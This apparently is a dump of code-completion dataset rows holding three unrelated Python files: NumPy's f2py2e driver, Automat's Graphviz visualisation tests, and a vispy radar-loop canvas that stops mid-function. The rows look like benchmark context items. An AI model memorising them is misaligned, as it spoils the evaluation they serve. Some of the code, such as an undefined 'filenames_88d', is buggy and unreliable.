gt
stringclasses 1
value | context
stringlengths 2.49k
119k
|
---|---|
#!/usr/bin/env python3
"""
f2py2e - Fortran to Python C/API generator. 2nd Edition.
See __usage__ below.
Copyright 1999--2011 Pearu Peterson all rights reserved,
Pearu Peterson <[email protected]>
Permission to use, modify, and distribute this software is given under the
terms of the NumPy License.
NO WARRANTY IS EXPRESSED OR IMPLIED. USE AT YOUR OWN RISK.
$Date: 2005/05/06 08:31:19 $
Pearu Peterson
"""
import sys
import os
import pprint
import re
from . import crackfortran
from . import rules
from . import cb_rules
from . import auxfuncs
from . import cfuncs
from . import f90mod_rules
from . import __version__
from . import capi_maps
f2py_version = __version__.version
numpy_version = __version__.version
errmess = sys.stderr.write
# outmess=sys.stdout.write
show = pprint.pprint
outmess = auxfuncs.outmess
__usage__ =\
f"""Usage:
1) To construct extension module sources:
f2py [<options>] <fortran files> [[[only:]||[skip:]] \\
<fortran functions> ] \\
[: <fortran files> ...]
2) To compile fortran files and build extension modules:
f2py -c [<options>, <build_flib options>, <extra options>] <fortran files>
3) To generate signature files:
f2py -h <filename.pyf> ...< same options as in (1) >
Description: This program generates a Python C/API file (<modulename>module.c)
that contains wrappers for given fortran functions so that they
can be called from Python. With the -c option the corresponding
extension modules are built.
Options:
--2d-numpy Use numpy.f2py tool with NumPy support. [DEFAULT]
--2d-numeric Use f2py2e tool with Numeric support.
--2d-numarray Use f2py2e tool with Numarray support.
--g3-numpy Use 3rd generation f2py from the separate f2py package.
[NOT AVAILABLE YET]
-h <filename> Write signatures of the fortran routines to file <filename>
and exit. You can then edit <filename> and use it instead
of <fortran files>. If <filename>==stdout then the
signatures are printed to stdout.
<fortran functions> Names of fortran routines for which Python C/API
functions will be generated. Default is all that are found
in <fortran files>.
<fortran files> Paths to fortran/signature files that will be scanned for
<fortran functions> in order to determine their signatures.
skip: Ignore fortran functions that follow until `:'.
only: Use only fortran functions that follow until `:'.
: Get back to <fortran files> mode.
-m <modulename> Name of the module; f2py generates a Python/C API
file <modulename>module.c or extension module <modulename>.
Default is 'untitled'.
'-include<header>' Writes additional headers in the C wrapper, can be passed
multiple times, generates #include <header> each time.
--[no-]lower Do [not] lower the cases in <fortran files>. By default,
--lower is assumed with -h key, and --no-lower without -h key.
--build-dir <dirname> All f2py generated files are created in <dirname>.
Default is tempfile.mkdtemp().
--overwrite-signature Overwrite existing signature file.
--[no-]latex-doc Create (or not) <modulename>module.tex.
Default is --no-latex-doc.
--short-latex Create 'incomplete' LaTeX document (without commands
\\documentclass, \\tableofcontents, and \\begin{{document}},
\\end{{document}}).
--[no-]rest-doc Create (or not) <modulename>module.rst.
Default is --no-rest-doc.
--debug-capi Create C/API code that reports the state of the wrappers
during runtime. Useful for debugging.
--[no-]wrap-functions Create Fortran subroutine wrappers to Fortran 77
functions. --wrap-functions is default because it ensures
maximum portability/compiler independence.
--include-paths <path1>:<path2>:... Search include files from the given
directories.
--help-link [..] List system resources found by system_info.py. See also
--link-<resource> switch below. [..] is optional list
of resources names. E.g. try 'f2py --help-link lapack_opt'.
--f2cmap <filename> Load Fortran-to-Python KIND specification from the given
file. Default: .f2py_f2cmap in current directory.
--quiet Run quietly.
--verbose Run with extra verbosity.
-v Print f2py version ID and exit.
numpy.distutils options (only effective with -c):
--fcompiler= Specify Fortran compiler type by vendor
--compiler= Specify C compiler type (as defined by distutils)
--help-fcompiler List available Fortran compilers and exit
--f77exec= Specify the path to F77 compiler
--f90exec= Specify the path to F90 compiler
--f77flags= Specify F77 compiler flags
--f90flags= Specify F90 compiler flags
--opt= Specify optimization flags
--arch= Specify architecture specific optimization flags
--noopt Compile without optimization
--noarch Compile without arch-dependent optimization
--debug Compile with debugging information
Extra options (only effective with -c):
--link-<resource> Link extension module with <resource> as defined
by numpy.distutils/system_info.py. E.g. to link
with optimized LAPACK libraries (vecLib on MacOSX,
ATLAS elsewhere), use --link-lapack_opt.
See also --help-link switch.
-L/path/to/lib/ -l<libname>
-D<define> -U<name>
-I/path/to/include/
<filename>.o <filename>.so <filename>.a
Using the following macros may be required with non-gcc Fortran
compilers:
-DPREPEND_FORTRAN -DNO_APPEND_FORTRAN -DUPPERCASE_FORTRAN
-DUNDERSCORE_G77
When using -DF2PY_REPORT_ATEXIT, a performance report of F2PY
interface is printed out at exit (platforms: Linux).
When using -DF2PY_REPORT_ON_ARRAY_COPY=<int>, a message is
sent to stderr whenever F2PY interface makes a copy of an
array. Integer <int> sets the threshold for array sizes when
a message should be shown.
Version: {f2py_version}
numpy Version: {numpy_version}
Requires: Python 3.5 or higher.
License: NumPy license (see LICENSE.txt in the NumPy source code)
Copyright 1999 - 2011 Pearu Peterson all rights reserved.
https://web.archive.org/web/20140822061353/http://cens.ioc.ee/projects/f2py2e"""
def scaninputline(inputline):
files, skipfuncs, onlyfuncs, debug = [], [], [], []
f, f2, f3, f5, f6, f7, f8, f9, f10 = 1, 0, 0, 0, 0, 0, 0, 0, 0
verbose = 1
dolc = -1
dolatexdoc = 0
dorestdoc = 0
wrapfuncs = 1
buildpath = '.'
include_paths = []
signsfile, modulename = None, None
options = {'buildpath': buildpath,
'coutput': None,
'f2py_wrapper_output': None}
for l in inputline:
if l == '':
pass
elif l == 'only:':
f = 0
elif l == 'skip:':
f = -1
elif l == ':':
f = 1
elif l[:8] == '--debug-':
debug.append(l[8:])
elif l == '--lower':
dolc = 1
elif l == '--build-dir':
f6 = 1
elif l == '--no-lower':
dolc = 0
elif l == '--quiet':
verbose = 0
elif l == '--verbose':
verbose += 1
elif l == '--latex-doc':
dolatexdoc = 1
elif l == '--no-latex-doc':
dolatexdoc = 0
elif l == '--rest-doc':
dorestdoc = 1
elif l == '--no-rest-doc':
dorestdoc = 0
elif l == '--wrap-functions':
wrapfuncs = 1
elif l == '--no-wrap-functions':
wrapfuncs = 0
elif l == '--short-latex':
options['shortlatex'] = 1
elif l == '--coutput':
f8 = 1
elif l == '--f2py-wrapper-output':
f9 = 1
elif l == '--f2cmap':
f10 = 1
elif l == '--overwrite-signature':
options['h-overwrite'] = 1
elif l == '-h':
f2 = 1
elif l == '-m':
f3 = 1
elif l[:2] == '-v':
print(f2py_version)
sys.exit()
elif l == '--show-compilers':
f5 = 1
elif l[:8] == '-include':
cfuncs.outneeds['userincludes'].append(l[9:-1])
cfuncs.userincludes[l[9:-1]] = '#include ' + l[8:]
elif l[:15] in '--include_paths':
outmess(
'f2py option --include_paths is deprecated, use --include-paths instead.\n')
f7 = 1
elif l[:15] in '--include-paths':
f7 = 1
elif l[0] == '-':
errmess('Unknown option %s\n' % repr(l))
sys.exit()
elif f2:
f2 = 0
signsfile = l
elif f3:
f3 = 0
modulename = l
elif f6:
f6 = 0
buildpath = l
elif f7:
f7 = 0
include_paths.extend(l.split(os.pathsep))
elif f8:
f8 = 0
options["coutput"] = l
elif f9:
f9 = 0
options["f2py_wrapper_output"] = l
elif f10:
f10 = 0
options["f2cmap_file"] = l
elif f == 1:
try:
with open(l):
pass
files.append(l)
except OSError as detail:
errmess(f'OSError: {detail!s}. Skipping file "{l!s}".\n')
elif f == -1:
skipfuncs.append(l)
elif f == 0:
onlyfuncs.append(l)
if not f5 and not files and not modulename:
print(__usage__)
sys.exit()
if not os.path.isdir(buildpath):
if not verbose:
outmess('Creating build directory %s\n' % (buildpath))
os.mkdir(buildpath)
if signsfile:
signsfile = os.path.join(buildpath, signsfile)
if signsfile and os.path.isfile(signsfile) and 'h-overwrite' not in options:
errmess(
'Signature file "%s" exists!!! Use --overwrite-signature to overwrite.\n' % (signsfile))
sys.exit()
options['debug'] = debug
options['verbose'] = verbose
if dolc == -1 and not signsfile:
options['do-lower'] = 0
else:
options['do-lower'] = dolc
if modulename:
options['module'] = modulename
if signsfile:
options['signsfile'] = signsfile
if onlyfuncs:
options['onlyfuncs'] = onlyfuncs
if skipfuncs:
options['skipfuncs'] = skipfuncs
options['dolatexdoc'] = dolatexdoc
options['dorestdoc'] = dorestdoc
options['wrapfuncs'] = wrapfuncs
options['buildpath'] = buildpath
options['include_paths'] = include_paths
options.setdefault('f2cmap_file', None)
return files, options
def callcrackfortran(files, options):
rules.options = options
crackfortran.debug = options['debug']
crackfortran.verbose = options['verbose']
if 'module' in options:
crackfortran.f77modulename = options['module']
if 'skipfuncs' in options:
crackfortran.skipfuncs = options['skipfuncs']
if 'onlyfuncs' in options:
crackfortran.onlyfuncs = options['onlyfuncs']
crackfortran.include_paths[:] = options['include_paths']
crackfortran.dolowercase = options['do-lower']
postlist = crackfortran.crackfortran(files)
if 'signsfile' in options:
outmess('Saving signatures to file "%s"\n' % (options['signsfile']))
pyf = crackfortran.crack2fortran(postlist)
if options['signsfile'][-6:] == 'stdout':
sys.stdout.write(pyf)
else:
with open(options['signsfile'], 'w') as f:
f.write(pyf)
if options["coutput"] is None:
for mod in postlist:
mod["coutput"] = "%smodule.c" % mod["name"]
else:
for mod in postlist:
mod["coutput"] = options["coutput"]
if options["f2py_wrapper_output"] is None:
for mod in postlist:
mod["f2py_wrapper_output"] = "%s-f2pywrappers.f" % mod["name"]
else:
for mod in postlist:
mod["f2py_wrapper_output"] = options["f2py_wrapper_output"]
return postlist
def buildmodules(lst):
cfuncs.buildcfuncs()
outmess('Building modules...\n')
modules, mnames, isusedby = [], [], {}
for item in lst:
if '__user__' in item['name']:
cb_rules.buildcallbacks(item)
else:
if 'use' in item:
for u in item['use'].keys():
if u not in isusedby:
isusedby[u] = []
isusedby[u].append(item['name'])
modules.append(item)
mnames.append(item['name'])
ret = {}
for module, name in zip(modules, mnames):
if name in isusedby:
outmess('\tSkipping module "%s" which is used by %s.\n' % (
name, ','.join('"%s"' % s for s in isusedby[name])))
else:
um = []
if 'use' in module:
for u in module['use'].keys():
if u in isusedby and u in mnames:
um.append(modules[mnames.index(u)])
else:
outmess(
f'\tModule "{name}" uses nonexisting "{u}" '
'which will be ignored.\n')
ret[name] = {}
dict_append(ret[name], rules.buildmodule(module, um))
return ret
def dict_append(d_out, d_in):
for (k, v) in d_in.items():
if k not in d_out:
d_out[k] = []
if isinstance(v, list):
d_out[k] = d_out[k] + v
else:
d_out[k].append(v)
def run_main(comline_list):
"""
Equivalent to running::
f2py <args>
where ``<args>=string.join(<list>,' ')``, but in Python. Unless
``-h`` is used, this function returns a dictionary containing
information on generated modules and their dependencies on source
files. For example, the command ``f2py -m scalar scalar.f`` can be
executed from Python as follows
You cannot build extension modules with this function, that is,
using ``-c`` is not allowed. Use ``compile`` command instead
Examples
--------
.. literalinclude:: ../../source/f2py/code/results/run_main_session.dat
:language: python
"""
crackfortran.reset_global_f2py_vars()
f2pydir = os.path.dirname(os.path.abspath(cfuncs.__file__))
fobjhsrc = os.path.join(f2pydir, 'src', 'fortranobject.h')
fobjcsrc = os.path.join(f2pydir, 'src', 'fortranobject.c')
files, options = scaninputline(comline_list)
auxfuncs.options = options
capi_maps.load_f2cmap_file(options['f2cmap_file'])
postlist = callcrackfortran(files, options)
isusedby = {}
for plist in postlist:
if 'use' in plist:
for u in plist['use'].keys():
if u not in isusedby:
isusedby[u] = []
isusedby[u].append(plist['name'])
for plist in postlist:
if plist['block'] == 'python module' and '__user__' in plist['name']:
if plist['name'] in isusedby:
# if not quiet:
outmess(
f'Skipping Makefile build for module "{plist["name"]}" '
'which is used by {}\n'.format(
','.join(f'"{s}"' for s in isusedby[plist['name']])))
if 'signsfile' in options:
if options['verbose'] > 1:
outmess(
'Stopping. Edit the signature file and then run f2py on the signature file: ')
outmess('%s %s\n' %
(os.path.basename(sys.argv[0]), options['signsfile']))
return
for plist in postlist:
if plist['block'] != 'python module':
if 'python module' not in options:
errmess(
'Tip: If your original code is Fortran source then you must use -m option.\n')
raise TypeError('All blocks must be python module blocks but got %s' % (
repr(postlist[i]['block'])))
auxfuncs.debugoptions = options['debug']
f90mod_rules.options = options
auxfuncs.wrapfuncs = options['wrapfuncs']
ret = buildmodules(postlist)
for mn in ret.keys():
dict_append(ret[mn], {'csrc': fobjcsrc, 'h': fobjhsrc})
return ret
def filter_files(prefix, suffix, files, remove_prefix=None):
"""
Filter files by prefix and suffix.
"""
filtered, rest = [], []
match = re.compile(prefix + r'.*' + suffix + r'\Z').match
if remove_prefix:
ind = len(prefix)
else:
ind = 0
for file in [x.strip() for x in files]:
if match(file):
filtered.append(file[ind:])
else:
rest.append(file)
return filtered, rest
def get_prefix(module):
p = os.path.dirname(os.path.dirname(module.__file__))
return p
def run_compile():
"""
Do it all in one call!
"""
import tempfile
i = sys.argv.index('-c')
del sys.argv[i]
remove_build_dir = 0
try:
i = sys.argv.index('--build-dir')
except ValueError:
i = None
if i is not None:
build_dir = sys.argv[i + 1]
del sys.argv[i + 1]
del sys.argv[i]
else:
remove_build_dir = 1
build_dir = tempfile.mkdtemp()
_reg1 = re.compile(r'--link-')
sysinfo_flags = [_m for _m in sys.argv[1:] if _reg1.match(_m)]
sys.argv = [_m for _m in sys.argv if _m not in sysinfo_flags]
if sysinfo_flags:
sysinfo_flags = [f[7:] for f in sysinfo_flags]
_reg2 = re.compile(
r'--((no-|)(wrap-functions|lower)|debug-capi|quiet)|-include')
f2py_flags = [_m for _m in sys.argv[1:] if _reg2.match(_m)]
sys.argv = [_m for _m in sys.argv if _m not in f2py_flags]
f2py_flags2 = []
fl = 0
for a in sys.argv[1:]:
if a in ['only:', 'skip:']:
fl = 1
elif a == ':':
fl = 0
if fl or a == ':':
f2py_flags2.append(a)
if f2py_flags2 and f2py_flags2[-1] != ':':
f2py_flags2.append(':')
f2py_flags.extend(f2py_flags2)
sys.argv = [_m for _m in sys.argv if _m not in f2py_flags2]
_reg3 = re.compile(
r'--((f(90)?compiler(-exec|)|compiler)=|help-compiler)')
flib_flags = [_m for _m in sys.argv[1:] if _reg3.match(_m)]
sys.argv = [_m for _m in sys.argv if _m not in flib_flags]
_reg4 = re.compile(
r'--((f(77|90)(flags|exec)|opt|arch)=|(debug|noopt|noarch|help-fcompiler))')
fc_flags = [_m for _m in sys.argv[1:] if _reg4.match(_m)]
sys.argv = [_m for _m in sys.argv if _m not in fc_flags]
del_list = []
for s in flib_flags:
v = '--fcompiler='
if s[:len(v)] == v:
from numpy.distutils import fcompiler
fcompiler.load_all_fcompiler_classes()
allowed_keys = list(fcompiler.fcompiler_class.keys())
nv = ov = s[len(v):].lower()
if ov not in allowed_keys:
vmap = {} # XXX
try:
nv = vmap[ov]
except KeyError:
if ov not in vmap.values():
print('Unknown vendor: "%s"' % (s[len(v):]))
nv = ov
i = flib_flags.index(s)
flib_flags[i] = '--fcompiler=' + nv
continue
for s in del_list:
i = flib_flags.index(s)
del flib_flags[i]
assert len(flib_flags) <= 2, repr(flib_flags)
_reg5 = re.compile(r'--(verbose)')
setup_flags = [_m for _m in sys.argv[1:] if _reg5.match(_m)]
sys.argv = [_m for _m in sys.argv if _m not in setup_flags]
if '--quiet' in f2py_flags:
setup_flags.append('--quiet')
modulename = 'untitled'
sources = sys.argv[1:]
for optname in ['--include_paths', '--include-paths', '--f2cmap']:
if optname in sys.argv:
i = sys.argv.index(optname)
f2py_flags.extend(sys.argv[i:i + 2])
del sys.argv[i + 1], sys.argv[i]
sources = sys.argv[1:]
if '-m' in sys.argv:
i = sys.argv.index('-m')
modulename = sys.argv[i + 1]
del sys.argv[i + 1], sys.argv[i]
sources = sys.argv[1:]
else:
from numpy.distutils.command.build_src import get_f2py_modulename
pyf_files, sources = filter_files('', '[.]pyf([.]src|)', sources)
sources = pyf_files + sources
for f in pyf_files:
modulename = get_f2py_modulename(f)
if modulename:
break
extra_objects, sources = filter_files('', '[.](o|a|so|dylib)', sources)
include_dirs, sources = filter_files('-I', '', sources, remove_prefix=1)
library_dirs, sources = filter_files('-L', '', sources, remove_prefix=1)
libraries, sources = filter_files('-l', '', sources, remove_prefix=1)
undef_macros, sources = filter_files('-U', '', sources, remove_prefix=1)
define_macros, sources = filter_files('-D', '', sources, remove_prefix=1)
for i in range(len(define_macros)):
name_value = define_macros[i].split('=', 1)
if len(name_value) == 1:
name_value.append(None)
if len(name_value) == 2:
define_macros[i] = tuple(name_value)
else:
print('Invalid use of -D:', name_value)
from numpy.distutils.system_info import get_info
num_info = {}
if num_info:
include_dirs.extend(num_info.get('include_dirs', []))
from numpy.distutils.core import setup, Extension
ext_args = {'name': modulename, 'sources': sources,
'include_dirs': include_dirs,
'library_dirs': library_dirs,
'libraries': libraries,
'define_macros': define_macros,
'undef_macros': undef_macros,
'extra_objects': extra_objects,
'f2py_options': f2py_flags,
}
if sysinfo_flags:
from numpy.distutils.misc_util import dict_append
for n in sysinfo_flags:
i = get_info(n)
if not i:
outmess('No %s resources found in system'
' (try `f2py --help-link`)\n' % (repr(n)))
dict_append(ext_args, **i)
ext = Extension(**ext_args)
sys.argv = [sys.argv[0]] + setup_flags
sys.argv.extend(['build',
'--build-temp', build_dir,
'--build-base', build_dir,
'--build-platlib', '.',
# disable CCompilerOpt
'--disable-optimization'])
if fc_flags:
sys.argv.extend(['config_fc'] + fc_flags)
if flib_flags:
sys.argv.extend(['build_ext'] + flib_flags)
setup(ext_modules=[ext])
if remove_build_dir and os.path.exists(build_dir):
import shutil
outmess('Removing build directory %s\n' % (build_dir))
shutil.rmtree(build_dir)
def main():
if '--help-link' in sys.argv[1:]:
sys.argv.remove('--help-link')
from numpy.distutils.system_info import show_all
show_all()
return
# Probably outdated options that were not working before 1.16
if '--g3-numpy' in sys.argv[1:]:
sys.stderr.write("G3 f2py support is not implemented, yet.\\n")
sys.exit(1)
elif '--2e-numeric' in sys.argv[1:]:
sys.argv.remove('--2e-numeric')
elif '--2e-numarray' in sys.argv[1:]:
# Note that this errors becaust the -DNUMARRAY argument is
# not recognized. Just here for back compatibility and the
# error message.
sys.argv.append("-DNUMARRAY")
sys.argv.remove('--2e-numarray')
elif '--2e-numpy' in sys.argv[1:]:
sys.argv.remove('--2e-numpy')
else:
pass
if '-c' in sys.argv[1:]:
run_compile()
else:
run_main(sys.argv[1:])
|
|
from __future__ import print_function
import functools
import os
import subprocess
from unittest import TestCase, skipIf
import attr
from .._methodical import MethodicalMachine
from .test_discover import isTwistedInstalled
def isGraphvizModuleInstalled():
"""
Is the graphviz Python module installed?
"""
try:
__import__("graphviz")
except ImportError:
return False
else:
return True
def isGraphvizInstalled():
"""
Are the graphviz tools installed?
"""
r, w = os.pipe()
os.close(w)
try:
return not subprocess.call("dot", stdin=r, shell=True)
finally:
os.close(r)
def sampleMachine():
"""
Create a sample L{MethodicalMachine} with some sample states.
"""
mm = MethodicalMachine()
class SampleObject(object):
@mm.state(initial=True)
def begin(self):
"initial state"
@mm.state()
def end(self):
"end state"
@mm.input()
def go(self):
"sample input"
@mm.output()
def out(self):
"sample output"
begin.upon(go, end, [out])
so = SampleObject()
so.go()
return mm
@skipIf(not isGraphvizModuleInstalled(), "Graphviz module is not installed.")
class ElementMakerTests(TestCase):
"""
L{elementMaker} generates HTML representing the specified element.
"""
def setUp(self):
from .._visualize import elementMaker
self.elementMaker = elementMaker
def test_sortsAttrs(self):
"""
L{elementMaker} orders HTML attributes lexicographically.
"""
expected = r'<div a="1" b="2" c="3"></div>'
self.assertEqual(expected,
self.elementMaker("div",
b='2',
a='1',
c='3'))
def test_quotesAttrs(self):
"""
L{elementMaker} quotes HTML attributes according to DOT's quoting rule.
See U{http://www.graphviz.org/doc/info/lang.html}, footnote 1.
"""
expected = r'<div a="1" b="a \" quote" c="a string"></div>'
self.assertEqual(expected,
self.elementMaker("div",
b='a " quote',
a=1,
c="a string"))
def test_noAttrs(self):
"""
L{elementMaker} should render an element with no attributes.
"""
expected = r'<div ></div>'
self.assertEqual(expected, self.elementMaker("div"))
@attr.s
class HTMLElement(object):
"""Holds an HTML element, as created by elementMaker."""
name = attr.ib()
children = attr.ib()
attributes = attr.ib()
def findElements(element, predicate):
"""
Recursively collect all elements in an L{HTMLElement} tree that
match the optional predicate.
"""
if predicate(element):
return [element]
elif isLeaf(element):
return []
return [result
for child in element.children
for result in findElements(child, predicate)]
def isLeaf(element):
"""
This HTML element is actually leaf node.
"""
return not isinstance(element, HTMLElement)
@skipIf(not isGraphvizModuleInstalled(), "Graphviz module is not installed.")
class TableMakerTests(TestCase):
"""
Tests that ensure L{tableMaker} generates HTML tables usable as
labels in DOT graphs.
For more information, read the "HTML-Like Labels" section of
U{http://www.graphviz.org/doc/info/shapes.html}.
"""
def fakeElementMaker(self, name, *children, **attributes):
return HTMLElement(name=name, children=children, attributes=attributes)
def setUp(self):
from .._visualize import tableMaker
self.inputLabel = "input label"
self.port = "the port"
self.tableMaker = functools.partial(tableMaker,
_E=self.fakeElementMaker)
def test_inputLabelRow(self):
"""
The table returned by L{tableMaker} always contains the input
symbol label in its first row, and that row contains one cell
with a port attribute set to the provided port.
"""
def hasPort(element):
return (not isLeaf(element)
and element.attributes.get("port") == self.port)
for outputLabels in ([], ["an output label"]):
table = self.tableMaker(self.inputLabel, outputLabels,
port=self.port)
self.assertGreater(len(table.children), 0)
inputLabelRow = table.children[0]
portCandidates = findElements(table, hasPort)
self.assertEqual(len(portCandidates), 1)
self.assertEqual(portCandidates[0].name, "td")
self.assertEqual(findElements(inputLabelRow, isLeaf),
[self.inputLabel])
def test_noOutputLabels(self):
"""
L{tableMaker} does not add a colspan attribute to the input
label's cell or a second row if there no output labels.
"""
table = self.tableMaker("input label", (), port=self.port)
self.assertEqual(len(table.children), 1)
(inputLabelRow,) = table.children
self.assertNotIn("colspan", inputLabelRow.attributes)
def test_withOutputLabels(self):
"""
L{tableMaker} adds a colspan attribute to the input label's cell
equal to the number of output labels and a second row that
contains the output labels.
"""
table = self.tableMaker(self.inputLabel, ("output label 1",
"output label 2"),
port=self.port)
self.assertEqual(len(table.children), 2)
inputRow, outputRow = table.children
def hasCorrectColspan(element):
return (not isLeaf(element)
and element.name == "td"
and element.attributes.get('colspan') == "2")
self.assertEqual(len(findElements(inputRow, hasCorrectColspan)),
1)
self.assertEqual(findElements(outputRow, isLeaf), ["output label 1",
"output label 2"])
@skipIf(not isGraphvizModuleInstalled(), "Graphviz module is not installed.")
@skipIf(not isGraphvizInstalled(), "Graphviz tools are not installed.")
class IntegrationTests(TestCase):
"""
Tests which make sure Graphviz can understand the output produced by
Automat.
"""
def test_validGraphviz(self):
"""
L{graphviz} emits valid graphviz data.
"""
p = subprocess.Popen("dot", stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
out, err = p.communicate("".join(sampleMachine().asDigraph())
.encode("utf-8"))
self.assertEqual(p.returncode, 0)
@skipIf(not isGraphvizModuleInstalled(), "Graphviz module is not installed.")
class SpotChecks(TestCase):
"""
Tests to make sure that the output contains salient features of the machine
being generated.
"""
def test_containsMachineFeatures(self):
"""
The output of L{graphviz} should contain the names of the states,
inputs, outputs in the state machine.
"""
gvout = "".join(sampleMachine().asDigraph())
self.assertIn("begin", gvout)
self.assertIn("end", gvout)
self.assertIn("go", gvout)
self.assertIn("out", gvout)
class RecordsDigraphActions(object):
"""
Records calls made to L{FakeDigraph}.
"""
def __init__(self):
self.reset()
def reset(self):
self.renderCalls = []
self.saveCalls = []
class FakeDigraph(object):
"""
A fake L{graphviz.Digraph}. Instantiate it with a
L{RecordsDigraphActions}.
"""
def __init__(self, recorder):
self._recorder = recorder
def render(self, **kwargs):
self._recorder.renderCalls.append(kwargs)
def save(self, **kwargs):
self._recorder.saveCalls.append(kwargs)
class FakeMethodicalMachine(object):
"""
A fake L{MethodicalMachine}. Instantiate it with a L{FakeDigraph}
"""
def __init__(self, digraph):
self._digraph = digraph
def asDigraph(self):
return self._digraph
@skipIf(not isGraphvizModuleInstalled(), "Graphviz module is not installed.")
@skipIf(not isGraphvizInstalled(), "Graphviz tools are not installed.")
@skipIf(not isTwistedInstalled(), "Twisted is not installed.")
class VisualizeToolTests(TestCase):
def setUp(self):
self.digraphRecorder = RecordsDigraphActions()
self.fakeDigraph = FakeDigraph(self.digraphRecorder)
self.fakeProgname = 'tool-test'
self.fakeSysPath = ['ignored']
self.collectedOutput = []
self.fakeFQPN = 'fake.fqpn'
def collectPrints(self, *args):
self.collectedOutput.append(' '.join(args))
def fakeFindMachines(self, fqpn):
yield fqpn, FakeMethodicalMachine(self.fakeDigraph)
def tool(self,
progname=None,
argv=None,
syspath=None,
findMachines=None,
print=None):
from .._visualize import tool
return tool(
_progname=progname or self.fakeProgname,
_argv=argv or [self.fakeFQPN],
_syspath=syspath or self.fakeSysPath,
_findMachines=findMachines or self.fakeFindMachines,
_print=print or self.collectPrints)
def test_checksCurrentDirectory(self):
"""
L{tool} adds '' to sys.path to ensure
L{automat._discover.findMachines} searches the current
directory.
"""
self.tool(argv=[self.fakeFQPN])
self.assertEqual(self.fakeSysPath[0], '')
def test_quietHidesOutput(self):
"""
Passing -q/--quiet hides all output.
"""
self.tool(argv=[self.fakeFQPN, '--quiet'])
self.assertFalse(self.collectedOutput)
self.tool(argv=[self.fakeFQPN, '-q'])
self.assertFalse(self.collectedOutput)
def test_onlySaveDot(self):
"""
Passing an empty string for --image-directory/-i disables
rendering images.
"""
for arg in ('--image-directory', '-i'):
self.digraphRecorder.reset()
self.collectedOutput = []
self.tool(argv=[self.fakeFQPN, arg, ''])
self.assertFalse(any("image" in line
for line in self.collectedOutput))
self.assertEqual(len(self.digraphRecorder.saveCalls), 1)
(call,) = self.digraphRecorder.saveCalls
self.assertEqual("{}.dot".format(self.fakeFQPN),
call['filename'])
self.assertFalse(self.digraphRecorder.renderCalls)
def test_saveOnlyImage(self):
"""
Passing an empty string for --dot-directory/-d disables saving dot
files.
"""
for arg in ('--dot-directory', '-d'):
self.digraphRecorder.reset()
self.collectedOutput = []
self.tool(argv=[self.fakeFQPN, arg, ''])
self.assertFalse(any("dot" in line
for line in self.collectedOutput))
self.assertEqual(len(self.digraphRecorder.renderCalls), 1)
(call,) = self.digraphRecorder.renderCalls
self.assertEqual("{}.dot".format(self.fakeFQPN),
call['filename'])
self.assertTrue(call['cleanup'])
self.assertFalse(self.digraphRecorder.saveCalls)
def test_saveDotAndImagesInDifferentDirectories(self):
"""
Passing different directories to --image-directory and --dot-directory
writes images and dot files to those directories.
"""
imageDirectory = 'image'
dotDirectory = 'dot'
self.tool(argv=[self.fakeFQPN,
'--image-directory', imageDirectory,
'--dot-directory', dotDirectory])
self.assertTrue(any("image" in line
for line in self.collectedOutput))
self.assertTrue(any("dot" in line
for line in self.collectedOutput))
self.assertEqual(len(self.digraphRecorder.renderCalls), 1)
(renderCall,) = self.digraphRecorder.renderCalls
self.assertEqual(renderCall["directory"], imageDirectory)
self.assertTrue(renderCall['cleanup'])
self.assertEqual(len(self.digraphRecorder.saveCalls), 1)
(saveCall,) = self.digraphRecorder.saveCalls
self.assertEqual(saveCall["directory"], dotDirectory)
def test_saveDotAndImagesInSameDirectory(self):
"""
Passing the same directory to --image-directory and --dot-directory
writes images and dot files to that one directory.
"""
directory = 'imagesAndDot'
self.tool(argv=[self.fakeFQPN,
'--image-directory', directory,
'--dot-directory', directory])
self.assertTrue(any("image and dot" in line
for line in self.collectedOutput))
self.assertEqual(len(self.digraphRecorder.renderCalls), 1)
(renderCall,) = self.digraphRecorder.renderCalls
self.assertEqual(renderCall["directory"], directory)
self.assertFalse(renderCall['cleanup'])
self.assertFalse(len(self.digraphRecorder.saveCalls))
|
|
import numpy as np
from collection import RadarFileCollection
from pyart.core.transforms import antenna_vectors_to_cartesian, corner_to_point
from quadmesh_geometry import mesh_from_quads, radar_example_data
from vispy import gloo
import vispy
import vispy.app
# from vispy.scene.widgets import ViewBox
from vispy.scene.visuals import Mesh, Text
from vispy.geometry import MeshData
from vispy.scene import STTransform, ChainTransform, MatrixTransform
from matplotlib.cm import ScalarMappable
from matplotlib.colors import Normalize
import glob
class Canvas(vispy.scene.SceneCanvas):
def __init__(self, size=(800, 800), name="Radar Loop",
timer_interval=1.0,
num_radars=1,
radar_filenames=None,
radar_latlons=None,
radar_fields=None,
time_start=None, time_end=None,
loop_step=10, image_duration=10):
'''
Parameters
----------
size : 2-tuple int
(x, y) size in pixels of window.
name : str
Name to use in window label.
timer_interval : float
Interval at which to update data in window.
num_radars : int
The number of radars to display.
radar_filenames : list
List of radar filenames to process. This can be a list of lists
if multiple radars are desired. num_radars must be > 1.
radar_latlons : list of tuples
List of (latitude, longitude) coordinates. This can be a list
the same length as radar_filenames. num_radars must be > 1.
time_start : datetime instance
Start time to use for subset.
time_end : datetime instance
End time to use for subset.
loop_step : float
Seconds between image update in frame.
image_duration : float
Seconds that each image will last in frame.
'''
# self.vb = scene.widgets.ViewBox(parent=self.scene, border_color='b')
# vb.camera.rect = 0, 0, 1, 1
# self.rotation = MatrixTransform()
# Perform a couple of checks
if radar_filenames is None:
print("Must provide a list of filenames!")
return
if (num_radars > 1) & (len(radar_filenames) != num_radars) & (len(radar_latlons) != num_radars):
print("ERROR: Must provide filenames and lat-lons for each radar!")
return
# Prepare some variables if two radars are chosen
self.radar_filenames = radar_filenames
self.t_start = time_start
self.t_end = time_end
self.rnum = num_radars
self.loop_dt = np.timedelta64(loop_step * 1000000000, 'ns')
self.loop_duration = np.timedelta64(image_duration * 1000000000, 'ns')
# Read in the radar files into a collection
self.rfc = []
self.rfc = []
for ii in range(self.rnum):
self.rfc.append(RadarFileCollection(self.radar_filenames[ii]))
## self.rfc = RadarFileCollection(filenames)
self.rfc_88d = RadarFileCollection(filenames_88d)
# Initialize variables for later use
self.dx, self.dy = [], []
if radar_fields is None:
self.radar_fields = ['reflectivity']
else:
self.radar_fields = [radar_fields[0]]
# Find corner points if required
if len(radar_latlons) > 1:
for num in range(1, len(radar_latlons)):
dx_tmp, dy_tmp = corner_to_point(radar_latlons[num], radar_latlons[num-1]) #meters
self.dx.append(dx_tmp)
self.dy.append(dy_tmp)
try:
